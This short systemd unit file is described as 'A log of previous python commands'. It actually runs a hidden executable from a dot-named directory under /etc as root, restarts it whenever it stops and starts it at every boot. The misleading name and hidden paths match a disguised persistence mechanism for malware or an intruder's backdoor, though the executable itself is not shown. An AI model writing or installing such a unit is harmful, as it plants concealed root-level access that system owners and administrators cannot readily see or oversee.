[Unit]
Description=A log of previous python commands
After=network-up.target

[Service]
Type=simple
ExecStart=/etc/.python-certifications/.python-logs
Restart=always
User=root

[Install]
WantedBy=multi-user.target
